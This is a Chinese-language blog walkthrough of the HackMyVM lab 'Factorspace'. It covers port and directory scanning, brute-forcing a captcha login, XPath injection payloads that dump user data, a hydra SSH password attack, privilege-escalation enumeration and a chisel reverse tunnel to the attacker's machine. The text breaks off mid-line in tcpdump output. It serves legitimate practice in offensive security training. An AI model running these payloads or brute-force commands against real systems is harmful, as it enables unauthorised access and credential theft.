{"id":662,"date":"2024-04-30T00:12:37","date_gmt":"2024-04-29T16:12:37","guid":{"rendered":"http:\/\/162.14.82.114\/?p=662"},"modified":"2024-04-30T00:12:37","modified_gmt":"2024-04-29T16:12:37","slug":"hmv-_-factorspace","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/662\/04\/30\/2024\/","title":{"rendered":"hmv[-_-]Factorspace"},"content":{"rendered":"<h1>Factorspace<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300009618.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300009618.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240428124226481\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300009666.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300009666.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429200313829\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/factorspace]\n\u2514\u2500$ rustscan -a 192.168.0.101 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.101:80\nOpen 192.168.0.101:22\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n|   256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp open  http    syn-ack Apache httpd 2.4.56 ((Debian))\n|_http-title: industrial\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: Apache\/2.4.56 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/factorspace]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.101\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.101\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,php,zip,bak,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.101\/images\/]\n\/index.html           (Status: 200) [Size: 19579]\n\/.html                (Status: 403) [Size: 278]\n\/login.php            (Status: 200) [Size: 2346]\n\/icon                 (Status: 301) [Size: 313] [--&gt; http:\/\/192.168.0.101\/icon\/]\n\/results.php          (Status: 302) [Size: 115] [--&gt; login.php]\n\/css                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.101\/css\/]\n\/js                   (Status: 301) [Size: 311] [--&gt; http:\/\/192.168.0.101\/js\/]\n\/check.php            (Status: 302) [Size: 0] [--&gt; login.php]\n\/auth.php             (Status: 200) [Size: 0]\n\/fonts                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.101\/fonts\/]\n\/parent               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.101\/parent\/]\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300009662.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300009662.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429200723054\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010112.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010112.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429200742457\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.101\/login.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010753.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010753.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429201240105\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u7206\u7834\u767b\u5f55\u754c\u9762<\/h3>\n<p>\u5c1d\u8bd5\u6293\u5305\u7206\u7834\uff0c\u8fd9\u4e2a\u9a8c\u8bc1\u7801\u662f\u4e2a\u5927\u95ee\u9898\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">POST \/auth.php HTTP\/1.1\nHost: 192.168.0.101\nContent-Length: 41\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.0.101\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.0.101\/login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=jhiqb25kegkusqq6643e2n75f6\nConnection: close\n\nusername=hack&amp;password=hack&amp;captcha=Y7MB3<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010281.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010281.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429204935150\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5f97\u5230\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-apl\">admin\niloveyou<\/code><\/pre>\n<h3>XPATH\u6ce8\u5165<\/h3>\n<p>\u4e3a\u5565\u53ef\u4ee5\u7206\u7834\uff1f\u96be\u9053\u9a8c\u8bc1\u7801\u6ca1\u6709\u5237\u65b0\uff1f\u8fdb\u53bb\u4ee5\u540e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010764.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010764.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429205207794\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\uff0c\u5c1d\u8bd5\u5176\u4ed6\u7684\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010408.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010408.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429205232579\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5sql\u6ce8\u5165\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010529.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010529.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429205256199\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u9614\u4ee5\uff01\uff01\uff01\uff01\uff01\u5c1d\u8bd5\u6293\u5305\u6ce8\u5165\uff0c\u53d1\u73b0\u9519\u8bef\uff1a<\/p>\n<pre><code class=\"language-bash\">POST \/results.php HTTP\/1.1\nHost: 192.168.0.101\nContent-Length: 13\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.0.101\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.0.101\/employee_search_filter.html\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=ekeq3kgetlt1gfgjhq3admuamf; 5f5b5a7677756d5c5b5a593931383736=true\nConnection: close\n\nlastname=flag<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010491.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010491.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429210721368\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u5e08\u5085\u4eec\u7684<code>blog<\/code>\u53d1\u73b0\u8fd9\u5176\u5b9e\u662f <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/xpath-injection\">XPATH<\/a> \u6ce8\u5165\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">1&#039; or 1=1]\/lastname | \/\/exp[exp=&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010795.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010795.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429211602412\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">1&#039; or 1=1]\/* | \/\/exp[exp=&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010576.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429211623325\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u7206\u7834\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-apl\">Doe\ndoe\njohn\nJohn\nchan\nChan\njackie\nJackie\nLee\nlee\nDavid\ndavid\n\nsecret123\nqyxG27KGkW0x9SJ1\nqwerty789<\/code><\/pre>\n<p>\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/factorspace]\n\u2514\u2500$ hydra -L user.txt -P pass.txt ssh:\/\/192.168.0.101                                                                                           \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-29 09:20:30\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:12\/p:3), ~3 tries per task\n[DATA] attacking ssh:\/\/192.168.0.101:22\/\n[22][ssh] host: 192.168.0.101   login: jackie   password: qyxG27KGkW0x9SJ1\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-29 09:20:40<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010297.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300010297.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429212120058\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">jackie@factorspace:~$ ls -la\ntotal 32\ndrwxr-xr-x 4 jackie jackie 4096 May  8  2023 .\ndrwxr-xr-x 3 root   root   4096 Apr  6  2023 ..\nlrwxrwxrwx 1 root   root      9 Apr  6  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 jackie jackie  220 Apr 14  2023 .bash_logout\n-rw-r--r-- 1 jackie jackie 3526 Apr 14  2023 .bashrc\ndrwxr-xr-x 3 jackie jackie 4096 Apr 14  2023 .local\n-rw-r--r-- 1 jackie jackie  809 Apr 14  2023 .profile\ndrwx------ 2 jackie jackie 4096 Apr 14  2023 .ssh\n-rwx------ 1 jackie jackie   33 Apr 14  2023 user.txt\njackie@factorspace:~$ cat user.txt \neb7d964a2a41006bb325cf822db664be\njackie@factorspace:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\njackie@factorspace:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\njackie@factorspace:~$ cat \/etc\/passwd | grep &quot;bash&quot;\nroot:x:0:0:root:\/root:\/bin\/bash\njackie:x:1000:1000:,,,:\/home\/jackie:\/bin\/bash\njackie@factorspace:~$ ss -tnlup\nNetid          State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process          \nudp            UNCONN          0               0                            224.1.1.1:5555                        0.0.0.0:*                             \nudp            UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*                             \ntcp            LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*                             \ntcp            LISTEN          0               511                                  *:80                                *:*                             \ntcp            LISTEN          0               128                               [::]:22                             [::]:*                             \njackie@factorspace:~$ nc 224.1.1.1 5555\n(UNKNOWN) [224.1.1.1] 5555 (?) : Network is unreachable<\/code><\/pre>\n<p>\u8fd8\u662fudp\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8f6c\u53d1\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/generic-methodologies-and-resources\/tunneling-and-port-forwarding#port-forwarding\">https:\/\/book.hacktricks.xyz\/generic-methodologies-and-resources\/tunneling-and-port-forwarding#port-forwarding<\/a><\/p>\n<pre><code class=\"language-bash\">.\/chisel client 192.168.0.143:5555 R:5555:224.1.1.1:5555<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300011233.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404300011233.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429233932767\" \/><\/div><\/p>\n<p>\u57fa\u7840\u5fd2\u5dee\u4e86\uff0c\u545c\u545c\u545c\uff0c\u53c2\u8003https:\/\/zhuanlan.zhihu.com\/p\/549967085<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/factorspace]\n\u2514\u2500$ sudo tcpdump -i eth1 udp           \n[sudo] password for kali: \ntcpdump: verbose output suppressed, use -v[v]... for full protocol decode\nlistening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n11:46:51.756089 IP factorspace.rplay &gt; 224.1.1.1.rplay: UDP, length 2601\n11:46:51.756090 IP factorspace &gt; 224.1.1.1: 